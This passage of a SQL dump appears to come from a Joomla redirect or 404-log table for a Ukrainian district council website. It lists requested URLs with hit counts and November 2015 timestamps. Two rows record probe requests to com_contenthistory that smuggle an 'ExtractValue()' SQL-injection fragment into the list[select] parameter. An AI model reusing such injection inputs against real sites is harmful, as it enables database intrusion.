00:00:00',301),(18834,'http://malyn-rayrada.org.ua/index.php/717-pozachergovi-vibori-prezidenta-vidbudutsja-25','','','',8,0,'2015-11-16 02:25:18','0000-00-00 00:00:00',301),(18835,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/536-pro-hid-vikonannja-rajonnoi-programi-zaluchennja_2','','','',11,0,'2015-11-16 02:28:58','0000-00-00 00:00:00',301),(18836,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/227-pro-zatverdzhennja-rajonnoi-programi-rozvitku_2','','','',11,0,'2015-11-16 03:35:12','0000-00-00 00:00:00',301),(18837,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=579:-2011-2015-&Itemid=77&lang=en&option=com_content&view=article','','','',8,0,'2015-11-16 03:35:16','0000-00-00 00:00:00',301),(18838,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1202-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',7,0,'2015-11-16 04:12:55','0000-00-00 00:00:00',301),(18839,'http://malyn-rayrada.org.ua/index.php/1204-vidbulas-42-sesiya-rajonnoji-radi','','','',7,0,'2015-11-16 05:05:10','0000-00-00 00:00:00',301),(18840,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=48&Itemid=87&lang=uk','','','',15,0,'2015-11-16 05:09:44','0000-00-00 00:00:00',301),(18841,'http://www.malyn-rayrada.org.ua/index.php/884-vidbulas-koordinatsijna-rada-pri-golovi-malinskoji-rajonnoji-radi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-16 05:52:42','0000-00-00 00:00:00',301),(18842,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=331:2011-05-20-16-30-09&catid=33&Itemid=66&lang=uk','','','',5,0,'2015-11-16 06:05:47','0000-00-00 00:00:00',301),(18843,'http://www.malyn-rayrada.org.ua/index.php/32-zasluzhene-zvannja-direktorovi-malinskoi-djussh?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-16 06:07:59','0000-00-00 00:00:00',301),(18844,'http://www.malyn-rayrada.org.ua/index.php/366-do-vidoma-zhiteliv-mista-ta-rajonu','','','',21,0,'2015-11-16 06:08:01','0000-00-00 00:00:00',301),(18845,'http://www.malyn-rayrada.org.ua/index.php/385-rezultati-ekzit-poliv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-16 06:08:03','0000-00-00 00:00:00',301),(18846,'http://www.malyn-rayrada.org.ua/index.php/408-ogoloshennja_2?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-16 06:08:08','0000-00-00 00:00:00',301),(18847,'http://www.malyn-rayrada.org.ua/index.php/475-vidbulas-pozachergova-19-sesija-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-16 06:08:10','0000-00-00 00:00:00',301),(18848,'http://www.malyn-rayrada.org.ua/index.php/499-za-materialami-zvernen-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-16 06:08:13','0000-00-00 00:00:00',301),(18849,'http://www.malyn-rayrada.org.ua/index.php/540-malinchani-budte-oberezhnimi-pid-chas-moroziv-i_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-16 06:08:15','0000-00-00 00:00:00',301),(18850,'http://www.malyn-rayrada.org.ua/index.php/562-upravlinnja-statistiki-informue?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-16 06:08:25','0000-00-00 00:00:00',301),(18851,'http://www.malyn-rayrada.org.ua/index.php/564-za-materialami-zvernen-po-medreformi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-16 06:08:30','0000-00-00 00:00:00',301),(18852,'http://www.malyn-rayrada.org.ua/index.php/566-pro-sklikannja-27-sesii-malinskoi-rajonnoi-radi','','','',15,0,'2015-11-16 06:08:33','0000-00-00 00:00:00',301),(18853,'http://www.malyn-rayrada.org.ua/index.php/567-ogoloshennja_4?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-16 06:08:39','0000-00-00 00:00:00',301),(18854,'http://www.malyn-rayrada.org.ua/index.php/581-likari-zasterigajut-dotrimujtes-gigieni','','','',15,0,'2015-11-16 06:08:46','0000-00-00 00:00:00',301),(18855,'http://www.malyn-rayrada.org.ua/index.php/818-informacija-pro-rezultati-konkursu-shhodo-vidboru','','','',13,0,'2015-11-16 06:08:48','0000-00-00 00:00:00',301),(18856,'http://www.malyn-rayrada.org.ua/users/registration','','','',1,0,'2015-11-16 06:32:13','0000-00-00 00:00:00',301),(18857,'http://www.malyn-rayrada.org.ua/index.php/632-zavershilas-pidgotovka-do-provedennja-24-sesii','','','',13,0,'2015-11-16 06:36:57','0000-00-00 00:00:00',301),(18858,'http://malyn-rayrada.org.ua/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(ExtractValue())','','','',3,0,'2015-11-16 06:38:48','0000-00-00 00:00:00',301),(18859,'http://malyn-rayrada.org.ua/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(ExtractValue())','','','',3,0,'2015-11-16 06:38:58','0000-00-00 00:00:00',301),(18860,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-11-16 06:44:01','0000-00-00 00:00:00',301),(18861,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2015-11-16 07:15:23','0000-00-00 00:00:00',301),(18862,'http://www.malyn-rayrada.org.ua/index.php/464-malinskij-ditjachij-shkoli-mistectv-50?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-16 07:28:01','0000-00-00 00:00:00',301),(18863,'http://www.malyn-rayrada.org.ua/user/register','','','',1,0,'2015-11-16 08:28:01','0000-00-00 00:00:00',301),(18864,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=509:2011-12-20-08-03-11&catid=38:--19122011-&Itemid=73&lang=ru','','','',7,0,'2015-11-16 08:32:34','0000-00-00 00:00:00',301),(18865,'http://malyn-rayrada.org.ua/index.php/1013-vidpovid-na-zvernennya-deputativ-rajonnoji-radi','','','',7,0,'2015-11-16 11:44:52','0000-00-00 00:00:00',301),(18866,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=627:2012-04-02-15-57-23&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2015-11-16 12:17:43','0000-00-00 00:00:00',301),(18867,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/631-pro-peredachu-ob’ektiv-spilnoi-vlasnosti','','','',2,0,'2015-11-16 12:17:46','0000-00-00 00:00:00',301),(18868,'http://www.malyn-rayrada.org.ua/index.php/250-z-peremogoju?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-16 12:29:02','0000-00-00 00:00:00',301),(18869,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=uk&limitstart=10','','','',1,0,'2015-11-16 13:13:49','0000-00-00 00:00:00',301),(18870,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47&layout=blog&Itemid=86&lang=uk&limitstart=10','','','',1,0,'2015-11-16 13:25:48','0000-00-00 00:00:00',301),(18871,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/630-pro-orendu-ob’ekta-spilnoi-vlasnosti-teritorialnih','','','',4,0,'2015-11-16 15:12:15','0000-00-00 00:00:00',301),(18872,'http://www.malyn-rayrada.org.ua/index.php/721-verhovna-rada-zatverdila-sklad-kabinetu-ministriv?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-16 16:39:46','0000-00-00 00:00:00',301),(18873,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=450:-l-2011-2013-r&catid=38:--19122011-&Itemid=73&lang=ru','','','',4,0,'2015-11-16 18:29:31','0000-00-00 00:00:00',301),(18875,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=447:2011-10-27-08-08-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2015-11-16 19:23:14','0000-00-00 00:00:00',301),(18876,'http://malyn-rayrada.org.ua/index.php/464-malinskij-ditjachij-shkoli-mistectv-50','','','',7,0,'2015-11-16 20:44:58','0000-00-00 00:00:00',301),(18877,'http://malyn-rayrada.org.ua/index.php/1195-dibrivska-silska-rada-oprilyudnyue-informatsiyu','','','',9,0,'2015-11-16 21:33:58','0000-00-00 00:00:00',301),(18878,'http://malyn-rayrada.org.ua/index.php/522-nardep-v-s-zhuravskij-prosit-vid-m-ja-azarova','','','',5,0,'2015-11-16 22:10:03','0000-00-00 00:00:00',301),(18879,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2015-11-16 22:24:25','0000-00-00 00:00:00',301),(18880,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=827:2012-11-20-17-44-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-11-16 22:24:29','0000-00-00 00:00:00',301),(18881,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-11-16 22:24:32','0000-00-00 00:00:00',301),(18882,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-11-16 22:24:33','0000-00-00 00:00:00',301),(18883,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-11-16 22:24:35','0000-00-00 00:00:00',301),(18884,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-11-16 22:24:42','0000-00-00 00:00:00',301),(18885,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2015-11-16 22:24:49','0000-00-00 00:00:00',301),(18886,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-11-16 22:24:52','0000-00-00 00:00:00',301),(18887,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',1,0,'2015-11-16 22:25:03','0000-00-00 00:00:00',301),(18888,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=en&Itemid=','','','',1,0,'2015-11-16 22:25:04','0000-00-00 00:00:00',301),(18889,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=ru&Itemid=','','','',1,0,'2015-11-16 22:25:06','0000-00-00 00:00:00',301),(18890,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=uk&Itemid=','','','',1,0,'2015-11-16 22:25:07','0000-00-00 00:00:00',301),(18891,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',1,0,'2015-11-16 22:25:09','0000-00-00 00:00:00',301),(18892,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',1,0,'2015-11-16 22:25:10','0000-00-00 00:00:00',301),(18893,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',1,0,'2015-11-16 22:25:13','0000-00-00 00:00:00',301),(18894,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=en&Itemid=','','','',1,0,'2015-11-16 22:25:15','0000-00-00 00:00:00',301),(18895,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',1,0,'2015-11-16 22:25:16','0000-00-00 00:00:00',301),(18896,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',1,0,'2015-11-16 22:25:18','0000-00-00 00:00:00',301),(18897,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-2012-&catid=46:--21122012&Itemid=85&lang=uk','','','',1,0,'2015-11-16 22:25:37','0000-00-00 00:00:00',301),(18898,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&catid=7:2010-06-05-12-53-35&Itemid=12&lang=en','','','',1,0,'2015-11-16 22:26:11','0000-00-00 00:00:00',301),(18899,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&catid=7:2010-06-05-12-53-35&Itemid=12&lang=ru','','','',1,0,'2015-11-16 22:26:13','0000-00-00 00:00:00',301),(18900,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&catid=7:2010-06-05-12-53-35&Itemid=12&lang=uk','','','',3,0,'2015-11-16 22:26:15','0000-00-00 00:00:00',301),(18901,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=31&Itemid=62&lang=uk','','','',2,0,'2015-11-16 22:26:41','0000-00-00 00:00:00',301),(18902,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=uk','','','',2,0,'2015-11-16 22:26:45','0000-00-00 00:00:00',301),(18903,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=68&lang=uk','','','',2,0,'2015-11-16 22:26:48','0000-00-00 00:00:00',301),(18904,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34:--15062011-&id=350:-----l---28r----&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-16 22:45:24','0000-00-00 00:00:00',301),(18905,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1140-starovorob-jivska-silska-rada-informue?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-17 00:40:32','0000-00-00 00:00:00',301),(18906,'http://www.malyn-rayrada.org.ua/index.php/1082-pro-sklikannya-39-sesiji-rajonnoji-radi-6-sklikannya?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-17 00:48:10','0000-00-00 00:00:00',301),(18907,'http://malyn-rayrada.org.ua/attachments/article/1122/Малегус.pdf','','','',6,0,'2015-11-17 01:36:46','0000-00-00 00:00:00',301),(18908,'http://malyn-rayrada.org.ua/index.php/3-vitannja-iz-svitlim-hristovim-voskresinnjam','','','',9,0,'2015-11-17 01:47:37','0000-00-00 00:00:00',301),(18911,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1020-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-17 04:46:01','0000-00-00 00:00:00',301),(18912,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1023-pro-zatverdzhennya-zvitu-pro-otsinka-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-17 04:46:05','0000-00-00 00:00:00',301),(18913,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1024-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-17 04:46:08','0000-00-00 00:00:00',301),(18914,'http://www.malyn-rayrada.org.ua/index.php/710-vitalij-francuz-novij-golova-zhitomirskoi-oblasnoi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-17 07:08:28','0000-00-00 00:00:00',301),(18915,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=642:2012-04-03-12-53-05&catid=32:2011-03-31-12-03-04&Itemid=64&lang=uk','','','',12,0,'2015-11-17 07:55:28','0000-00-00 00:00:00',301),(18916,'http://www.malyn-rayrada.org.ua/index.php/684-vitaemo-iz-svjatom-svjatogo-mikolaja?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-17 08:11:45','0000-00-00 00:00:00',301),(18917,'http://malyn-rayrada.org.ua/index.php/626-vidbulos-zasidannja-koordinacijnoi-radi-pri-golovi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-17 08:39:45','0000-00-00 00:00:00',301),(18918,'http://malyn-rayrada.org.ua/index.php/711-vidbulosja-pidpisannja-ugodi-pro-vreguljuvannja','','','',5,0,'2015-11-17 08:40:10','0000-00-00 00:00:00',301),(18919,'http://malyn-rayrada.org.ua/index.php/712-verhovna-rada-povernula-konstituciju-2004-roku','','','',5,0,'2015-11-17 08:40:12','0000-00-00 00:00:00',301),(18920,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/161-pro-peredachu-chastini-primishhennja-vorsivskoi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-17 08:43:00','0000-00-00 00:00:00',301),(18921,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/162-pro-nadannja-zgodi-na-prijnjattja-u-spilnu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-17 08:43:01','0000-00-00 00:00:00',301),(18922,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/167-pro-viplatu-odnorazovoi-groshovoi-dopomogi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-17 08:43:05','0000-00-00 00:00:00',301),(18923,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/168-pro-peredachu-koshtiv-na-zdijsnennja-vidatkiv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-17 08:43:06','0000-00-00 00:00:00',301),(18924,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/149-pro-hid-vikonannja-rajonnoi-programi_4?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-17 08:43:09','0000-00-00 00:00:00',301),(18925,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/150-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-17 08:43:11','0000-00-00 00:00:00',301),(18926,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/228-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_4?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-17 08:43:14','0000-00-00 00:00:00',301),(18927,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/533-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp_2','','','',3,0,'2015-11-17 08:43:20','0000-00-00 00:00:00',301),(18928,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/534-pro-zvernennja-do-verhovnoi-radi-ukraini-shhodo','','','',3,0,'2015-11-17 08:43:23','0000-00-00 00:00:00',301),(18929,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/542-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_20?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-17 08:43:40','0000-00-00 00:00:00',301),(18930,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/543-pro-peredachu-traktora?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-17 08:43:44','0000-00-00 00:00:00',301),(18931,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/545-pro-vnesennja-zmin-do-rajonnoi-cilovoi-programi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-17 08:43:50','0000-00-00 00:00:00',301),(18932,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/546-pro-zminu-nazvi-vorsivskoi-zosh-i-ii-stupeniv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-17 08:43:54','0000-00-00 00:00:00',301),(18933,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/551-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_10?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-17 08:43:57','0000-00-00 00:00:00',301),(18934,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/555-pro-vikonannja-rajonnogo-bjudzhetu-za-pershe','','','',3,0,'2015-11-17 08:43:59','0000-00-00 00:00:00',301),(18935,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/206-pro-hid-vikonannja-kompleksnoi-dovgostrokovoi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-17 08:44:07','0000-00-00 00:00:00',301),(18936,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/219-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-17 08:44:08','0000-00-00 00:00:00',301),(18937,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/154-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-17 08:44:31','0000-00-00 00:00:00',301),(18938,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/285-pro-peredachu-neruhomogo-majna-shho-perebuvae-u','','','',3,0,'2015-11-17 08:45:33','0000-00-00 00:00:00',301),(18939,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/237-pro-vstup-malinskoi-rajonnoi-radi-do-vseukrainskoi','','','',3,0,'2015-11-17 08:46:23','0000-00-00 00:00:00',301),(18940,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-?limitstart=0','','','',11,0,'2015-11-17 08:46:24','0000-00-00 00:00:00',301),(18941,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-?start=7','','','',13,0,'2015-11-17 08:46:28','0000-00-00 00:00:00',301),(18942,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/68-rishennya-vid-25-09-2014-roku/879-pro-nadannya-prava-malinskij-rajonnij-radi-zdijsniti-pererakhuvannya-koshtiv','','','',4,0,'2015-11-17 08:46:30','0000-00-00 00:00:00',301),(18943,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=515:2011-12-22-10-09-17&catid=38:--19122011-&Itemid=73&lang=en','','','',3,0,'2015-11-17 08:46:43','0000-00-00 00:00:00',301),(18944,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-11-17 08:46:45','0000-00-00 00:00:00',301),(18945,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=637:2012-04-03-12-34-11&catid=42:--16052012-&Itemid=80&lang=uk','','','',3,0,'2015-11-17 08:46:48','0000-00-00 00:00:00',301),(18946,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=639:2012-04-03-12-41-18&catid=42&Itemid=80&lang=ru','','','',3,0,'2015-11-17 08:46:49','0000-00-00 00:00:00',301),(18947,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=644:2012-04-04-09-52-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-11-17 08:46:51','0000-00-00 00:00:00',301),(18948,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=en','','','',3,0,'2015-11-17 08:46:57','0000-00-00 00:00:00',301),(18949,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=en&Itemid=','','','',2,0,'2015-11-17 08:46:59','0000-00-00 00:00:00',301),(18950,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=ru','','','',3,0,'2015-11-17 08:47:04','0000-00-00 00:00:00',301),(18951,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=ru&Itemid=','','','',2,0,'2015-11-17 08:47:06','0000-00-00 00:00:00',301),(18952,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=uk&Itemid=','','','',2,0,'2015-11-17 08:47:07','0000-00-00 00:00:00',301),(18953,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-11-17 08:47:09','0000-00-00 00:00:00',301),(18954,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-11-17 08:47:10','0000-00-00 00:00:00',301),(18955,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-11-17 08:47:12','0000-00-00 00:00:00',301),(18956,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=789:-2012-2014-&catid=45&Itemid=84&lang=en','','','',2,0,'2015-11-17 08:47:20','0000-00-00 00:00:00',301),(18957,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=789:-2012-2014-&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-11-17 08:47:22','0000-00-00 00:00:00',301),(18958,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=793:2012-10-17-06-29-27&catid=45&Itemid=84&lang=en','','','',2,0,'2015-11-17 08:47:27','0000-00-00 00:00:00',301),(18959,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=793:2012-10-17-06-29-27&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-11-17 08:47:28','0000-00-00 00:00:00',301),(18960,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=794:-lr&catid=45&Itemid=84&lang=en','','','',2,0,'2015-11-17 08:47:30','0000-00-00 00:00:00',301),(18961,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=794:-lr&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-11-17 08:47:31','0000-00-00 00:00:00',301),(18962,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=795:-20-2011-108-l-r-&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-11-17 08:47:33','0000-00-00 00:00:00',301),(18963,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=797:-6-16112010-5-&catid=45&Itemid=84&lang=en','','','',2,0,'2015-11-17 08:47:37','0000-00-00 00:00:00',301),(18964,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=797:-6-16112010-5-&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-11-17 08:47:39','0000-00-00 00:00:00',301),(18965,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=797:-6-16112010-5-&catid=45:--14112012-&Itemid=84&lang=en','','','',2,0,'2015-11-17 08:47:40','0000-00-00 00:00:00',301),(18966,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=797:-6-16112010-5-&catid=45:--14112012-&Itemid=84&lang=ru','','','',2,0,'2015-11-17 08:47:42','0000-00-00 00:00:00',301),(18967,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=797:-6-16112010-5-&catid=45:--14112012-&Itemid=84&lang=uk','','','',2,0,'2015-11-17 08:47:44','0000-00-00 00:00:00',301),(18968,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&catid=2&Itemid=5&lang=ru','','','',2,0,'2015-11-17 08:47:52','0000-00-00 00:00:00',301),(18969,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-11-17 08:47:57','0000-00-00 00:00:00',301),(18970,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-11-17 08:47:59','0000-00-00 00:00:00',301),(18971,'http://www.malyn-rayrada.org.ua/index.php?id=54&Itemid=95&lang=ru&layout=blog&option=com_content&view=category','','','',4,0,'2015-11-17 09:39:57','0000-00-00 00:00:00',301),(18974,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=30','','','',4,0,'2015-11-17 10:58:38','0000-00-00 00:00:00',301),(18975,'http://www.malyn-rayrada.org.ua/index.php?id=59&Itemid=107&lang=en&layout=blog&option=com_content&view=category','','','',3,0,'2015-11-17 11:03:10','0000-00-00 